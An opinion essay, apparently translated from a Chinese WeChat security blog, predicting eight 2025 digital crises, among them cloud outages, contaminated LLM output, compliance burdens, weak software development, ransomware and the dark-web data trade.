2025，数字化面临的危机

From 2025 onwards, various top ten challenges will emerge. As a grassroots worker, the digital crises we will face in 2025 have become an important reference for guiding cybersecurity work. Based on what we have done, seen, heard in the past five years, as well as the constantly emerging policies, regulations, departmental rules, and various standards of the country, the author proposes the digital crisis we will face in 2025. Originally, we planned to use "terror", but we were afraid of being defined as a title party, so we still use "crisis" more appropriately.

Firstly, we will face various strange cloud interruption issues. In fact, from the perspective of traditional network technology, the minimum impact boundary of a server host is a business function or module; The biggest impact is a complete breakdown of business logic; However, from the perspective of cloud technology, the minimal impact of a virtual host crash is on the SaaS applications published on that virtual host. However, due to the butterfly effect caused by a virtual host crash in the case of shared resources, it may lead to competition conditions in the entire resource pool and crash, thereby affecting the entire cloud platform. This itself is a simple technical logic issue, but in the actual process of error correction, due to issues with software development, cloud service providers, SaaS administrators, and cross organizational application owners, achieving a unified response becomes a challenge. Moreover, with the generalization of cloud technology, various cloud platforms have emerged one after another, including government cloud, information and innovation cloud, public cloud, community cloud, private cloud, and even many professional clouds. Whether there is a secure cloud architecture for each cloud platform itself has not been well reflected in actual cloud design. Many times, we deploy weak cloud applications on a cloud platform that has already been polluted or is about to be polluted. The ultimate crisis of cloud computing will be exposed in low-quality software development scenarios.

Secondly, the contaminated LLM supply chain. A large model supply chain may be perceived by many as the supply relationships that make up the large model. What I would like to discuss more is the supply chain crisis arising from the application of large-scale models. With people's trust in generative artificial intelligence, many times we rely entirely on it for decision-making and production of products, such as files, plans, code, learning evaluations, summaries, etc. However, as we utilize these technologies, it becomes increasingly unclear whether we will verify whether the results output by large models are correct or meet our needs. I believe that inserting malicious scripts into the generated code of large models is not just the end, but just the beginning. More often than not, the discriminatory answers generated by large models in generative question answering, and even the ideological domain questions that may arise, are challenging social order and stability. We will question the output of the big model, but have we ever questioned why the big model produces such output? Is it a problem with the preset model or with the training data? Are we using our own model or are we using a common interface model? How long will this error spread, and who will correct, detect, identify, and prevent its occurrence remains a mystery. When we trust the big model to process data based on token patterns for data security, can we also realize how machines can transform and ultimately their creators can still have the ability to restore data. More importantly, when we apply big models to industries such as energy, transportation, and healthcare, will the automatic decision-making mechanism of the "nonsense" big models lead to more serious crises and consequences? Sometimes it's not a matter of how you tune it, but rather a question of whether the malignant consequences that a large model may produce have emergency response capabilities.

Thirdly, blind data security techniques. Both the Data Security Law and the Network Data Security Management Regulations have made clear requirements for establishing storage encryption for important data. Fundamentally, this is a necessary technical means and measure, but the question of whether encryption operations can be directly implemented on databases is constantly challenging various organizations. We often face a fact. Many institutions that do security work do not understand business and database technology, and even do not understand development. This often leads to security thinking being based on compliance and pure hacker attack and defense thinking (of course, this hacker thinking is not practical thinking, but more of a "CTF hacker" thinking), blindly emphasizing the ideal of security first. But in reality, we are faced with the possibility that all technological means developed for data may directly or indirectly lead to business interruption or delay. There are not many organizations and experts who can truly consider data security issues from a business perspective. Therefore, the business crisis brought about by data security compliance has become an inevitable existence.

Fourth, how to deal with inferior software development that is superior to others. The IT field itself is a highly technical industry, and those who work in this industry should build their confidence and respect on the traceability and implementation of technology. But now there are some distorted technological thinking that make this industry a form of entertainment. Many software developers are able to obtain a large number of development projects and ongoing maintenance projects not because of their excellent development capabilities, but more because of the benefits brought by business relationships. Once there is a problem with the developed software, it is not more about relying on development skills to solve the problem, but rather on networking to quell public opinion. This situation is in opposition to China's rapidly developing digital construction. In recent years, whether in software supply chain security audits or software lifecycle audits, an increasing number of drawbacks and problems have been discovered in grassroots software development teams. The toughest part of a development team is not the core development engineer, but the project manager, and the toughness of the project manager does not come from project quality, but from social relationships. Especially prevalent within the government system and state-owned enterprises. Leaving aside the crisis of digitalization in the future, many digital issues will be highlighted one by one in future applications. More importantly, the fundamental source of data security lies in how software effectively handles data activities during design and schedules data through effective code. If we continue to stack software on top of functionality, data security will always be just a compliance requirement.

Fifth, how to deal with the endless compliance checks. From the initial evaluation of network security level protection, to password evaluation, data security evaluation, and future critical information infrastructure evaluation. Most network operators are already exhausted in dealing with these issues. The lack of unified standards and guidelines has led to various conflicts and contradictions among national, industry, provincial, and higher-level supervisory departments during the inspection process. Almost all organizations are working and investing for inspection. The inspection itself should be transparent, which means that we must inform the inspected party of the basis, requirements, criteria, and evaluation standards for the inspection. However, in reality, we mostly inspect for certain interests. Less and less of our security work is truly implemented.

Sixth, how to understand compliance and certification as "compliance does not represent safety, and certification does not represent professionalism" has become a new crisis. The Regulations on the Administration of Network Data Security propose that network data management personnel should possess professional knowledge of network data security. However, how can this "professional knowledge" be reflected? Does it rely on basic certificates? Is it based on practical work experience and history? We have been discussing from top to bottom how to implement security certification and training more practically, but in the actual implementation process, we will find that this is a huge ecological chain problem that cannot be solved simply by building a profession, publishing a textbook, or conducting certification. Solving people's problems is fundamental. Do compliance professionals truly understand compliance, and do training professionals truly comprehend the knowledge you are discussing. In theory, in the early stages of anything, mastering this skill is only for individuals rather than the general public. The knowledge transmission and development formed through continuous iteration is the benign process of forming knowledge cognition. Certificates cannot represent abilities, and domestic certificates are increasingly being replaced by commercial value. This crisis will have a long-term impact on the development and progress of future cybersecurity work.

Seventh, it is still 'ransomware'. The evolution speed of ransomware has surpassed our defense speed. Under the temptation of high value, the technological development of "ransomware" will continue to advance. Perhaps on the night of our New Year's Eve celebration, a new variant of "ransomware" has been born. Essentially, this is a true technological confrontation. He represents the culmination of 40 years of cybersecurity work. Many people may say that APT is the pinnacle, but it should be noted that ransomware itself is already heavily using APT technology. In the future, high latency ransomware is no longer just about extortion, but a combination of network warfare, continuous pickpocketing, intelligent analysis and judgment of high-value targets, and cross resource pool intrusion using cloud technology. Multi source ransomware is becoming more and more like the virtual world hegemon in "The Matrix". It is unknown whether future ransomware will evolve into non-human controlled viruses with autonomous consciousness based on intelligent development, but this is definitely not an illusion, but a necessity. It can be foreseen that ransomware that fully applies memory technology in the future will be even more terrifying than the "Stuxnet" of the past.

Eighth, the prosperity of the "dark web economy" brought about by the economic crisis. The intelligence and commercialization of data have made the crawling and selling of inventory markets increasingly prosperous in recent years. Even internal personnel or third-party service personnel have engaged in massive inventory sales. The challenge of data security is sometimes not just about dealing with external attacks. The illegal acquisition and exploitation of internal data will become increasingly common with the development of the dark web economy. Under the stimulation of the dark web economy, various types of data are continuously being delivered to the dark web, and various interest groups will form a new wave of national threats, online fraud, data analysis, and data reprocessing through the obtained data, which will become more common. Never discuss how to protect personal privacy. More often than not, we should focus on what methods and means we use to protect our interests from being harmed when privacy is maliciously exploited.

This is a 2025 crisis issue proposed from the perspective of a pragmatist, which cannot be compared to the opinions of various high-end experts. More often than not, we need to generate a wake-up call or coping mechanism from a crisis. Instead of waiting for the crisis to come and praying for forgiveness from heaven. Any loss is a punishment from heaven for disrespecting rules. We do not have a 'Noah's Ark' for cybersecurity, and we can only rely on the power of ordinary humans to resist punishment from the 'God of the Internet'.

Are you ready to accept punishment?

原文始发于微信公众号（老烦的草根安全观）：2025，数字化面临的危机